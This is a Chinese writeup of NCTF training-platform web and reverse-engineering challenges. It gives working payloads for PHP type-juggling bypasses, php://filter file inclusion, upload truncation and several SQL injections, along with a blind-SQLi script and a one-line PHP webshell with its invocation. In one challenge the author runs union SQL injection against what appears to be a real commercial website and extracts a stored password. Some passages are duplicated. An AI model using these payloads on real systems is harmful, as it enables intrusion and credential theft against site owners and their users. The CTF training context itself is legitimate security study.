1200字范文,内容丰富有趣,写作的好帮手!
1200字范文 > NCTF 南京邮电大学网络攻防训练平台 WriteUp

NCTF 南京邮电大学网络攻防训练平台 WriteUp

时间:2019-10-09 05:08:28

相关推荐

NCTF 南京邮电大学网络攻防训练平台 WriteUp

NCTF 南京邮电大学网络攻防训练平台 WriteUp

不说什么直接上题解

WEB

1.签到题(50)

直接查看网页源码

Flag:nctf{flag_admiaanaaaaaaaaaaa}

2.md5 collision(50)

源码如下:

<?php$md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) {echo "nctf{*****************}";} else {echo "false!!!";}}else{echo "please input a";}?>

重点在这里

if ($a != 'QNKCDZO' && $md51 == $md52) {echo "nctf{*****************}";1.$a不等于'QNKCDZO' 但$a的MD5等于'QNKCDZO'的MD5这想想也是不可能的事,此中必有蹊跷2.观察发现md5('QNKCDZO')='0e830400451993494058024219903391'3.在php中==号为弱比较'0e'开头剩下的全为数字不管数字是多少==恒成立因为'0e***'==0

所以下一步的目的很明显制造开头为 ‘0e’ 的MD5字符串

字符串生成

这里将$a=s878926199a

得到flag:nctf{md5_collision_is_easy}

3.签到2(50)

网页源码如下:

<html><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />尚未登录或口令错误<form action="./index.php" method="post"><p>输入框:<input type="password" value="" name="text1" maxlength="10"><br>请输入口令:zhimakaimen<input type="submit" value="开门"></form></html>

重点在这

<p>输入框:<input type="password" value="" name="text1" maxlength="10"><br>请输入口令:zhimakaimen输入的口令长度为11,而他html源码限制的长度为10

处理方法有两种:

利用浏览器自带插件,我这里用的是Firefox的hackbar插件,直接越过HTML代码直接进行post传递

利用burpsuit工具直接在http头上稍作修改,只需将text1赋值为zhimakaimen即可

上述两种方法都能直接得到flag

flag:nctf{follow_me_to_exploit}

4.这题不是WEB(100)

打开之后有个猫的图片

将猫图片下载至桌面

用txt打开此文档

发现如下:

最后为flag:nctf{photo_can_also_hid3_msg}

5.层层递进(100)

最讨厌脑洞题,拿着题不知道如何下手最后看了writeup才知道访问的URL:/web3/404.html

进去之后查看源码发现了如下代码:

<!-- <script src="./js/jquery-n.7.2.min.js"></script><script src="./js/jquery-c.7.2.min.js"></script><script src="./js/jquery-t.7.2.min.js"></script><script src="./js/jquery-f.7.2.min.js"></script><script src="./js/jquery-{.7.2.min.js"></script><script src="./js/jquery-t.7.2.min.js"></script><script src="./js/jquery-h.7.2.min.js"></script><script src="./js/jquery-i.7.2.min.js"></script><script src="./js/jquery-s.7.2.min.js"></script><script src="./js/jquery-_.7.2.min.js"></script><script src="./js/jquery-i.7.2.min.js"></script><script src="./js/jquery-s.7.2.min.js"></script><script src="./js/jquery-_.7.2.min.js"></script><script src="./js/jquery-a.7.2.min.js"></script><script src="./js/jquery-_.7.2.min.js"></script><script src="./js/jquery-f.7.2.min.js"></script><script src="./js/jquery-l.7.2.min.js"></script><script src="./js/jquery-4.7.2.min.js"></script><script src="./js/jquery-g.7.2.min.js"></script><script src="./js/jquery-}.7.2.min.js"></script>-->

这段代码一眼就看出flag的举手 handsup

flag:nctf{this_is_a_fl4g}

6.AAencode(100)

tips:javascript aaencode

aaencode是js加密的一种特别好玩,可以吧文字加密成表情

除了aaencode之外还有几种特别的加密方式

Perl的ppencodeRuby的rrencode

编码连接如下:/android-html5/archive//02/09/2533784.html

AAencode 可以直接在chrome浏览器的控制台console直接运行:

运行方式如图:

这里有console的好玩用法:/Wayou/p/chrome-console-tips-and-tricks.html

总之console在这了可以执行js AAencode加密过的代码:

得到flag:nctf{javascript_aaencode}

7.单身二十年(100)

题目上说看手速,其实一开始用浏览器查看网络流发现如下:

看见了没!!!有个源文件 search_key.php!!!

接下来就是截获这个源文件了。。。。。

直接上burpsuit截获。上图

key is : nctf{yougotit_script_now}

8.你从哪里来(100)

are you from google?

一看就知道我要伪造从/ 那里来

这里有篇博客写的就是http header的字段

这里面有个referer字段:HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器藉此可以获得一些信息用于处理。

我们另Referer:/

再burpsuit直接改就行

如下图:

拿到flag:nctf{http_referer}

9.php decode(100)

直接让解码,看看代码吧

<?phpfunction CLsI($ZzvSWE) {$ZzvSWE = gzinflate(base64_decode($ZzvSWE));for ($i = 0; $i < strlen($ZzvSWE); $i++) {$ZzvSWE[$i] = chr(ord($ZzvSWE[$i]) - 1);}return $ZzvSWE;}eval(CLsI("+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA=="));?>

eval 是个神奇的函数关于eval的链接在这

eval可以执行php代码所以我直接让他执行并输出修改代码如下:

echo CLsI("+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA==");

放在php里直接运行,得出结果

flag:nctf{gzip_base64_hhhhhh}

10.文件包含(150)

这道题非常棒!!!让我学到了一个新的漏洞

文件包含漏洞,先了解一下php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。

同时我也借此机会学到了文件读取的相关知识。

include “test.php”php文件包含,在执行流中插入写在其他文件中的有用的代码。读取的时候也是数据流形式,因此可以使用php://filter进行过滤,返回值为0,1。readfile(“test.php”)是将文件以数据流的形式读取过来,并不会执行,但会在前台浏览器上进行解析。返回值是字节数多少。

file_get_contents(“test.php”)返回值为文本内容

此题运用的就是关于数据流过滤的文件包含,我们一般在进行文件包含的时候都这么写include “test.php”获得的就是test.php直接解析出来。但如果运用readfile(“test.php”) 就不进行解析,导致无法在浏览器前台进行显示。那么问题来了看题

它让我点击它 我一下子就点了他!!!

出来了个这个URL

http://4./web7/index.php?file=show.php

一看呵呵哒,典型的文件包含漏洞我们可以通过构造含有漏洞的语句,查看想要看的代码

file=php://filter/read=convert.base64-encode/resource=index.php

这里有个关于漏洞的详解

简单的重复一下他的意思

注解:

1.php://filter/可用于处理打开的数据流,起到过滤作用。如果源文件为.php则很有可能在前台显示不出来。

2.此时我们采用的方法是,先让文件转化为base64格式(convert.base64-encode)然后再输出,这样不论是什么格式的文件都可以在前台输出。

3.再次解码就可得到源代码,怎么样是不是很神奇啊!

看图片:

看见了base64编码!!

python解码就行啦,看图

flag:nctf{edulcni_elif_lacol_si_siht}

11 .单身一百年也没用(150)

上去直接查看请求头:

flag就在眼前nctf{this_is_302_redirect}

最简单的一道题

12 .Download~!(200)

查看页面源码:

<p><a href="download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=" target="_blank">星星点灯</a></p><p><a href="download.php?url=YnV4aWFuZ3poYW5nZGEubXAz" target="_blank">不想长大</a></p>发现了下载文件的URLdownload.php?url=base64('文件名')这里我没想到下载download.php。不过想想也是,这也没有其他文件了吧除了这个。果断转码base64('download.php')=ZG93bmxvYWQucGhwURL=/web6/download.php?url=ZG93bmxvYWQucGhw

下载得到download.php代码,如下:

<?phperror_reporting(0);include("hereiskey.php");$url=base64_decode($_GET[url]);if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){$file_size = filesize($url);header ( "Pragma: public" );header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );header ( "Cache-Control: private", false );header ( "Content-Transfer-Encoding: binary" );header ( "Content-Type:audio/mpeg MP3");header ( "Content-Length: " . $file_size);header ( "Content-Disposition: attachment; filename=".$url);echo(file_get_contents($url));exit;}else {echo "Access Forbidden!";}?>

又发现了一个文件hereiskey.php,估计flag就在里面,果断下载

URL:/web6/download.php?url=aGVyZWlza2V5LnBocA==

得到flag代码:

?<?php//flag:nctf{download_any_file_666}?>

flag:nctf{download_any_file_666}

13 .COOKIE(200)

TIP:

0==not

tip很有用哒,0==not,脑补1==yes

看样子要修改cookie了,看http报头

OK目的很明确

修改cookie

有两种方法:

利用chrome自带的cookie工具

利用burpsuit直接修改

flag:nctf{cookie_is_different_from_session}

14.MYSQL(200)

一上来就给我们科普:robots.txt

这里有百科

看我robots.txt的代码

<?phpif($_GET[id]) {mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);mysql_select_db(SAE_MYSQL_DB);$id = intval($_GET[id]);$query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));if ($_GET[id]==1024) {echo "<p>no! try again</p>";}else{echo($query[content]);}}?>if ($_GET[id]==1024) {echo "<p>no! try again</p>";}//说明id!=1024$id = intval($_GET[id]);//这是前面的代码 转为整数随手输了个id=1024.1过了

flag is:nctf{query_in_mysql}

15.sql injection 3(200)

终于开始了sql注入,等了好久~~~

看题!!!

当我让id=2时,呵呵哒出来了

title:gbk_sql_injection

gbk宽字节注入的题目,这里有链接解释宽字节注入

还有一个

题目中输入id=’ 则会显示成id=’\”很显然’被自动转义了。

这是我们输入id=%df’ or 1=1#

很显然成功了 ,\没了

发现news数据库里面并没有flag~~~

盲打莽撞,发现了个flag数据库(不要问我是怎么知道的,猜的) 直接上union查询

URL:index.php?id=%df%27union select *,1 from flag%23

直接爆出flag

再多说一句当输入index.php?id=%df%27union select *from flag%23时

ErrorThe used SELECT statements have a different number of columns

说明字段不同加个字段试试,index.php?id=%df%27union select *,1 from flag%23

总结

union查询原则

前后的字段数量必须相同查询出来的字段全是第一个数据表中的字段第一个数据库有结果集则第二个查询的结果集接在第一个结果集的后面如果第一个查询没有结果集,则显示的全是第二个查询的结果集

才出来: flag:nctf{gbk_3sqli}

16./x00(200)

这题是一道好题!!!

直接就有源码:

view-source:if (isset ($_GET['nctf'])) {if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)echo '必须输入数字才行';else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE) die('Flag: '.$flag);elseecho '骚年,继续努力吧啊~';}

ereg详解

strops详解

这里ereg有两个漏洞

%00截断及遇到%00则默认为字符串的结束当ntf为数组时它的返回值不是FALSE

所以有两个方法去攻这道题目

1.令id=1%00%23biubiubiu

2.令nctf为数组则,nctf[]=111

附加:

=== 格式也等!== (0!==false 为true)

最后附上这道题目的答案

flag:nctf{use_00_to_jieduan}

17.bypass again(200)

依旧是弱类型

看来又是弱类型的php漏洞

if (isset($_GET['a']) and isset($_GET['b'])) {if ($_GET['a'] != $_GET['b'])if (md5($_GET['a']) === md5($_GET['b']))die('Flag: '.$flag);elseprint 'Wrong.';}

$_GET可以接受数组但MD5

md5()不能处理数组结构的数据

利用此漏洞构造index.php?a[]=1&b[]=2

Flag: nctf{php_is_so_cool}

18.变量覆盖(200)

直接见代码:

<?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?><?php extract($_POST); if ($pass == $thepassword_123) { ?><div class="alert alert-success"><code><?php echo $theflag; ?></code></div><?php } ?><?php } ?>

这里有extract的详解

总的来说是extract() 函数从数组中将变量导入到当前的符号表。

典型的变量覆盖

if ($pass == $thepassword_123) { ?>只需要覆盖$pass、$thepassword_123这两个变量使他们相等即可

flag:nctf{bian_liang_fu_gai!}

19.PHP是世界上最好的语言(250)

看源码

<?phpif(eregi("hackerDJ",$_GET[id])) {echo("<p>not allowed!</p>");exit();}$_GET[id] = urldecode($_GET[id]);if($_GET[id] == "hackerDJ"){echo "<p>Access granted!</p>";echo "<p>flag: *****************} </p>";}?>

观察一下发现有两个判断条件

if(eregi("hackerDJ",$_GET[id]))//id与hackerDJ不相同$_GET[id] = urldecode($_GET[id]);//id又经历了一次URL解码if($_GET[id] == "hackerDJ")//解码后的id与hackerDJ相同这下子好办了两次URL加密即可 ,只加密前一个字符其实url编码就是一个字符ascii码的十六进制。h的URL编码为%68,在进行一次编码后为%2568则令id=%2568ackerDJ

url :/php/index.php?id=%2568ackerDJ

flag: nctf{php_is_best_language}

20.伪装者(250)

这题是固定的模式,直接伪造http头有两种方法:

Firefox modify headers 插件

直接burpsuit截断添加 x-forwarded-for:127.0.0.1

nctf{happy_http_headers}

21.Header(250)

这题好low

直接看报头

flag就在其中

nctf{tips_often_hide_here}

22.上传绕过(250)

我首先上传了一个1.jpg文件

然后报的提示是这样的

必须是php文件才行啊!

然后就上传1.php文件

然后报的提示是这样的

只允许上传 jpg,GIF ,png后缀的文件

这才意识到我要上传.jpg的文件让他识别为.php的文件,怎么才能做到呢???

看她的第一个错误提示它是怎么识别文件后缀的

它是根据./uploads目录下的basename进行识别的

在我们上传的时候会出现./uploads

尝试着在/uploads/下加个0X00字符截断 先这么写/uploads/1.php

然后 filename=”1.jpg”

报错如下:

basename为1.php 1.jpg

OK

下一步就在这里加一个截断/uploads/1.php0x00

方法如下:

用burpsuit 截断

在/uploads/后面加上1.php (这里是空格好标识)然后打开hex编码寻找空格及20

找到之后将其修改为00 按回车确认

此时变为

然后直接提交

flag:nctf{welcome_to_hacks_world}

23.SQL注入1(300)

直接看源码

<?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $user = trim($_POST[user]); $pass = md5(trim($_POST[pass])); $sql="select user from ctf where (user='".$user."') and (pw='".$pass."')"; echo '</br>'.$sql; $query = mysql_fetch_array(mysql_query($sql)); if($query[user]=="admin") { echo "<p>Logged in! flag:******************** </p>"; } if($query[user] != "admin") { echo("<p>You are not admin!</p>"); } } echo $query[user]; ?>

这里有trim的详解

这里起到过滤字符串两端空格的作用

这道题*****一个字坑

看见括号了没,我一直没看见··········

最简单的注入 和password无关

user=admin ‘)#//注意括号要闭合不然报错 我就是被坑的

提交

flag:nctf{ni_ye_hui_sql?}

24.pass check(300)

直接看核心代码

还有tip:strcmp(array,string)=null=0

<?php$pass=@$_POST['pass'];$pass1=***********;//被隐藏起来的密码if(isset($pass)){if(@!strcmp($pass,$pass1)){echo "flag:nctf{*}";}else{echo "the pass is wrong!";}}else{echo "please input pass!";}?>

tip一出这题就没有难度了

直接传pass个数组形式pass[]=1

look

flag:nctf{strcmp_is_n0t_3afe}

25.起名字真难(300)

代码如下:

<?phpfunction noother_says_correct($number){$one = ord('1');$nine = ord('9');for ($i = 0; $i < strlen($number); $i++){ $digit = ord($number{$i});if ( ($digit >= $one) && ($digit <= $nine) ){return false;}}return $number == '54975581388';}$flag='*******';if(noother_says_correct($_GET['key']))echo $flag;else echo 'access denied';?>

分析一下代码要让number == ‘54975581388’,并且number每个字符与’54975581388’都不同,这就没辙了 。

想想啊 让两个数相等换个进制呗

只能换十六进制了

if ( ($digit >= $one) && ($digit <= $nine) )//因为这段代码的限制

54975581388==0xccccccccc

所以URL:/web12/index.php?key=0xccccccccc

The flag is:nctf{follow_your_dream}

26.密码重置(300)

首先看URL:/web13/index.php?user1=Y3RmdXNlcg%3D%3D

user1是什么鬼,我用base64解密之后 哈哈 原来是ctfuser

直接上图吧不多说什么了

27.php 反序列化(300)

代码:

<?phpclass just4fun {var $enter;var $secret;}if (isset($_GET['pass'])) {$pass = $_GET['pass'];if(get_magic_quotes_gpc()){$pass=stripslashes($pass);}$o = unserialize($pass);if ($o) {$o->secret = "*";if ($o->secret === $o->enter)echo "Congratulation! Here is my secret: ".$o->secret;else echo "Oh no... You can't fool me";}else echo "are you trolling?";}?>

这里有序列化反序列化的科普

总的来说让输一个·序列化过后的字符串并且类中的变量始终保持相同,这一下子就想到了引用 a=&b

($o->secret === $o->enter)

我构造如下代码制造序列化字符串:

<?php class just4fun {var $enter;var $secret;function just4fun(){$this->enter=&$this->secret;}}echo serialize(new just4fun());?>

OK flag 出来啦

flag: nctf{serialize_and_unserialize}

28.sql injection 4(300)

直接看代码:

<!--#GOAL: login as admin,then get the flag;error_reporting(0);require 'db.inc.php';function clean($str){if(get_magic_quotes_gpc()){$str=stripslashes($str);}return htmlentities($str, ENT_QUOTES);}$username = @clean((string)$_GET['username']);$password = @clean((string)$_GET['password']);$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';$result=mysql_query($query);if(!$result || mysql_num_rows($result) < 1){die('Invalid password!');}echo $flag;-->

科普htmlentities($str, ENT_QUOTES)

这是一个单引号过滤。我们就没有办法添加单引号闭合了,看来只能运用转义字符吃掉单引号了。怎么吃掉的呢??

我在本地搭了一个环境

现在的mysql查询语句变成了SELECT * FROM users WHERE name=’\’ AND pass=’ or 1=1 #’;

tip:在mysql查询语句中转义字符不参与闭合 也就是说第二个单引号不参与闭合 第一个单引号和第三个单引号闭合此时

name=’\’ AND pass=’

然后是下面的 or 1=1

结果一下就出来了

flag:nctf{sql_injection_is_interesting}

29.综合题(300)

tip:bash

打开一看这是什么啊jother编码

chrome console解码得:

1bc29b36f623ba82aaf6724fd3b16718.php

直接打开文件

看tip:history of bash

上网搜了一下history of bash

/.bash_history 文件

于是打开文件

出现zip -r flagbak.zip ./*

输上URL:/web3/b0b0ad119f425408fc3d45253137d33d/flagbak.zip

自动下载了flagbak.zip

解压里面就有flag

flag is:nctf{bash_history_means_what}

30.SQL注入2(400)

tip: 注入第二题~~主要考察union查询

<?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $user = $_POST[user]; $pass = md5($_POST[pass]); $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'")); if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) { echo "<p>Logged in! Key: ntcf{**************} </p>"; } else { echo("<p>Log in failure!</p>"); } } ?>

仔细看看代码

$query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));if (($query[pw]) && (!strcasecmp($pass, $query[pw])))观察发现只要让结果集中有你输入密码的MD5值就行嘿嘿

这样就OK啦

flag: ntcf{union_select_is_wtf}

31.综合题2(400)

终于把这题给搞懂了,还看了别人的题解

1. 第一步

点击本cms说明

出来一堆文件,发现file后面可接文件名,并将文件荡出来,于是写了python脚本,开始荡文件

/about.php?file=sm.txt

# -*- coding: utf-8 -*-import requestsimport HTMLParserimport codecss=['say','config','passencode','index','so','antiinject','antixss']h = HTMLParser.HTMLParser()for i in s:url="/about.php?file={0}.php".format(i);f=codecs.open(str(i)+'.php','w+','utf-8')#codecs可指定文件编码s=requests.get(url)s.encoding='utf-8'f.write(h.unescape(s.text))#反转意html实体

下面看看文件

so.php<?php if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser"){ echo '万恶滴黑阔,本功能只有用本公司开发的浏览器才可以用喔~'; exit(); } $id=$_POST['soid']; include 'config.php'; include 'antiinject.php'; include 'antixss.php'; $id=antiinject($id); $con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error()); mysql_select_db($db_name,$con); $id=mysql_real_escape_string($id); $result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id"); $rs=mysql_fetch_array($result); echo htmlspecialchars($rs['nice']).':<br />&nbsp;&nbsp;&nbsp;&nbsp;'.antixss($rs['say']).'<br />'; mysql_free_result($result); mysql_free_result($file); mysql_close($con); ?>

say.php<?phpinclude 'config.php';$nice=$_POST['nice'];$say=$_POST['usersay'];if(!isset($_COOKIE['username'])){setcookie('username',$nice);setcookie('userpass','');}$username=$_COOKIE['username'];$userpass=$_COOKIE['userpass'];if($nice=="" || $say==""){echo "<script>alert('昵称或留言内容不能为空!(如果有内容也弹出此框,不是网站问题喔~ 好吧,给个提示:查看页面源码有惊喜!)');</script>";exit();}$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error());mysql_select_db($db_name,$con);$nice=mysql_real_escape_string($nice);$username=mysql_real_escape_string($username);$userpass=mysql_real_escape_string($userpass);$result=mysql_query("SELECT username FROM admin where username='$nice'",$con);$login=mysql_query("SELECT * FROM admin where username='$username' AND userpass='$userpass'",$con);if(mysql_num_rows($result)>0 && mysql_num_rows($login)<=0){echo "<script>alert('昵称已被使用,请更换!');</script>";mysql_free_result($login);mysql_free_result($result);mysql_close($con);exit();}mysql_free_result($login);mysql_free_result($result);$say=mysql_real_escape_string($say);mysql_query("insert into message (nice,say,display) values('$nice','$say',0)",$con);mysql_close($con);echo '<script>alert("构建和谐社会,留言需要经过管理员审核才可以显示!");window.location = "./index.php"</script>';?>

passencode.php<?phpfunction passencode($content){//$pass=urlencode($content);$array=str_split($content);$pass="";for($i=0;$i<count($array);$i++){if($pass!=""){$pass=$pass." ".(string)ord($array[$i]);}else{$pass=(string)ord($array[$i]);}}return $pass;}?>

antixss.php<?php function antixss($content){ preg_match("/(.*)\[a\](.*)\[\/a\](.*)/",$content,$url); $key=array("(",")","&","\\","<",">","'","%28","%29"," on","data","src","eval","unescape","innerHTML","document","appendChild","createElement","write","String","setTimeout","cookie");//因为太菜,很懒,所以。。。(过滤规则来自Mramydnei) $re=$url[2]; if(count($url)==0){ return htmlspecialchars($content); }else{ for($i=0;$i<=count($key);$i++){ $re=str_replace($key[$i], '_',$re); } return htmlspecialchars($url[1],ENT_QUOTES).'<a href="'.$re.'">'.$re.'</a>'.htmlspecialchars($url[3],ENT_QUOTES); } } ?>

antiinject.php<?phpfunction antiinject($content){$keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","=");$info=strtolower($content);for($i=0;$i<=count($keyword);$i++){$info=str_replace($keyword[$i], '',$info);}return $info;}?>

about.php<?php$file=$_GET['file'];if($file=="" || strstr($file,'config.php')){echo "file参数不能为空!";exit();}else{$cut=strchr($file,"loginxlcteam");if($cut==false){$data=file_get_contents($file);$date=htmlspecialchars($data);echo $date;}else{echo "<script>alert('敏感目录,禁止查看!但是。。。')</script>";}}

2.注入

id搜索后出现so.php,存在注入点soid。数据表名为admin 字段名username userpass

开始注入,利用burpsuit先报username的内容

file=1/*/aandnd/*/exists(selselectect/*/usernamnamee/*/frfromom/*/admadminin/*/limit 1,1)

判断出username字段长度为5,userpass字段长度为6

利用脚本爆内容

import requestsurl=r'/so.php'header={'User-Agent': 'Xlcteam Browser',}dic='0123456789abcdefghijklmnopqrstuvwxyz'string=''for i in range(1,6):for j in dic:id='1/**/anandd/**/exists(selselectect/**/*/**/frfromom/**/admadminin/**/where/**/oorrd(substr(usernamnamee,{0},1))>{1})'.format(str(i),str(ord(j)))#只需将username更改为uerpassdata={'soid':id}s=requests.post(url=url,headers=header,data=data)content=s.textprint 1if(len(content)<430):string+=jbreakprint string

结果为admin 107099010701140117011001160117

后面的加密算法在passencode.php里面解密为fuckruntu

有了账号密码就可以登后台了在about.php里有loginxlcteam

/loginxlcteam/

登录

一句话木马

xlcteam.php<?php$e = $_REQUEST['www'];$arr = array($_POST['wtf'] => '|.*|e',);array_walk($arr, $e, '');?>

典型的一句话木马

上网搜索

令www=preg_replace&wtf=print_r(scandir(‘.’))

出flag

32.注入实战1(500)

我超喜欢这道题说真的我学到了好多呢

看题

1. 第一步

首先利用order by 爆出字段数

order by 1000 时报错了

http://www.backstagecommerce.ca/services.php?id=1 order by 1000

然后用二分法爆出他的字段数为19

2. 第二步

利用联合查询 爆出显示字段

http://www.backstagecommerce.ca/services.php?id=-1%20union%20select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#

这里的id=-1这是为什么呢,因为啊id如果不为-1 结果集里第一条就是该查询到的结果,而后面的select 内容并不会显示出来,所以这里要赋给没有的id,负值都可以。

这里爆出了3,6,7,8,9,10,11,12,13 这么多的显示字段,下一步我们用哪个字段都行来爆他的数据表

报表语句

http://www.backstagecommerce.ca/services.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,(select group_concat(table_name) from information_schema.tables where table_schema=database()),12,13,14,15,16,17,18,19#主要是这句话(select group_concat(table_name) from information_schema.tables where table_schema=database())把这句话放到显示字段位置上即可group_concat这里不多做解释,意思是多个字段查询的结果合并后在一行显示information_schema.tables里面有数据库中的所有表database()指的是当前数据库table_schema指的是所有数据库table_name 是属于information_schema.tables的表 相当于其中的一个元素如果不懂自己动手查吧

爆出来的表名如下

有木有看见user数据表我们只关心这个,下一步要爆字段了

3. 第三步

这一步我们要爆字段

有了数据表字段还不好爆吗

http://www.backstagecommerce.ca/services.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,(select group_concat(column_name) from information_schema.columns where table_name='users'),13,14,15,16,17,18,19#information_schema.columns 该数据库中的所有字段table_name 表的名字column_name 属于information_schema.columns中的元素看看都爆出来了什么字段

看见没password字段 我们想要的东西在里面 下一步把值给爆出来吧!!!

4. 第四步

这一步 我们要爆他的密码

http://www.backstagecommerce.ca/services.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,(select password from users),13,14,15,16,17,18,19#也可以这样http://www.backstagecommerce.ca/services.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,(password),13,14,15,16,17,18,19 from users#

密码就在上图BSCmarketing24

然后再md5加密成 f3d6cc916d0739d853e50bc92911dddb

flag: nctf{f3d6cc916d0739d853e50bc92911dddb}

33.密码重置2(500)

TIPS:

1.管理员邮箱观察一下就可以找到

2.linux下一般使用vi编辑器,并且异常退出会留下备份文件

3.弱类型bypass

根据源码发现了邮箱

admin@

tip2:上网搜了vi编辑器异常退出留下备份文件名

直接打开.submit.php.swp文件如下

源码如下........这一行是省略的代码......../*如果登录邮箱地址不是管理员则 die()数据库结构---- 表的结构 `user`--CREATE TABLE IF NOT EXISTS `user` (`id` int(11) NOT NULL AUTO_INCREMENT,`username` varchar(255) NOT NULL,`email` varchar(255) NOT NULL,`token` int(255) NOT NULL DEFAULT '0',PRIMARY KEY (`id`)) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;---- 转存表中的数据 `user`--INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES(1, '****不可见***', '***不可见***', 0);*/........这一行是省略的代码........if(!empty($token)&&!empty($emailAddress)){if(strlen($token)!=10) die('fail');if($token!='0') die('fail');$sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";$r = mysql_query($sql) or die('db error');$r = mysql_fetch_assoc($r);$r = $r['num'];if($r>0){echo $flag;}else{echo "失败了呀";}}```23***重点在这***<div class="se-preview-section-delimiter"></div>

if(strlen(token)!=10)die(‘fail′);if(token!=’0’) die(‘fail’);

长度为十并且值为零

只有$token=0000000000

“`

将邮箱admin@

密码0000000000

得到flag

flag:nctf{thanks_to_cumt_bxs}

总的来说收获不小,特别是在写writeup的时候,因为写的比较细所以基本上问题都解决了,付出和收获成正比!!!仅供大家参考如果有更好的方法也希望互相交流!!!祝大家玩得愉快!!!

if(strlen($token)!=10) die('fail');if($token!='0') die('fail');长度为十并且值为零只有$token=0000000000

将邮箱admin@

密码0000000000

得到flag

flag:nctf{thanks_to_cumt_bxs}

REVERSE

1.Hello.RE

用OD直接找strcmp

2.READasm

00000000004004e6 <func>:4004e6: 55push rbp4004e7: 48 89 e5 mov rbp,rsp4004ea: 48 89 7d e8 mov QWORD PTR [rbp-0x18],rdi ;input[]4004ee: 89 75 e4 mov DWORD PTR [rbp-0x1c],esi ;284004f1: c7 45 fc 01 00 00 00 mov DWORD PTR [rbp-0x4],0x1 ;i = 14004f8: eb 28 jmp 400522 <func+0x3c> ;for(i;i<=28;i++)4004fa: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]4004fd: 48 63 d0 movsxd rdx,eax ;i 400500: 48 8b 45 e8 mov rax,QWORD PTR [rbp-0x18]400504: 48 01 d0 add rax,rdx ;rax = i + string[0]400507: 8b 55 fc mov edx,DWORD PTR [rbp-0x4] ;edx = i40050a: 48 63 ca movsxd rcx,edx ;rcx = i40050d: 48 8b 55 e8 mov rdx,QWORD PTR [rbp-0x18] ;rdx = string400511: 48 01 ca add rdx,rcx ;rdx = i + string[0]400514: 0f b6 0a movzx ecx,BYTE PTR [rdx] ;ecx = chr(i+string[0])400517: 8b 55 fc mov edx,DWORD PTR [rbp-0x4] ;edx = i40051a: 31 ca xor edx,ecx 40051c: 88 10 mov BYTE PTR [rax],dl40051e: 83 45 fc 01 add DWORD PTR [rbp-0x4],0x1400522: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]400525: 3b 45 e4 cmp eax,DWORD PTR [rbp-0x1c]400528: 7e d0 jle 4004fa <func+0x14>40052a: 90nop40052b: 5dpop rbp40052c: c3ret

直接写exploit

#coding=utf8input = [ 0x67, 0x6e, 0x62, 0x63, 0x7e, 0x74, 0x62, 0x69, 0x6d,0x55, 0x6a, 0x7f, 0x60, 0x51, 0x66, 0x63, 0x4e, 0x66, 0x7b,0x71, 0x4a, 0x74, 0x76, 0x6b, 0x70, 0x79, 0x66 , 0x1c];j = 1;s = ""for i in input:s += chr(i^j)j += 1print s

总的来说收获不小,特别是在写writeup的时候,因为写的比较细所以基本上问题都解决了,付出和收获成正比!!!仅供大家参考如果有更好的方法也希望互相交流!!!祝大家玩得愉快!!!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。